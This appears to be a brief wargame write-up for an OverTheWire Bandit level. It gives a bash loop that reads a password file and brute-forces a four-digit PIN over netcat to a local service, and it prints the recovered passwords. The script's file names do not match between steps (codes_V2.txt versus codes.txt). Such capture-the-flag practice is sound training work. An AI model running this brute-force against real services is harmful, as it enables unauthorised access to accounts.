uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG
First create a text file (inside a dir previously created) in /tmp/ with all possible combinations:
for i in {0000..9999}; do echo -ne "Number $i"'\r'; echo "$(cat /etc/bandit_pass/bandit24) $i" >> /tmp/mydir24225/codes_V2.txt; done

After creating this list send all possible combinations to the conection piping the cat command of the file to the socket:
cat /tmp/mydir24225/codes.txt | nc 127.0.0.1 30002 | grep -v "again\|Wrong\|separated" >> /tmp/mydir24225/bandit25.txt

As can be seen I piped the output from the socket to grep to avoid having errors withing last file. (The error messages are known due to previous atempts)

When reading the file I had:
"Correct!
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG

Exiting."

It was a tough one :)

PS: key -> "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 2588"
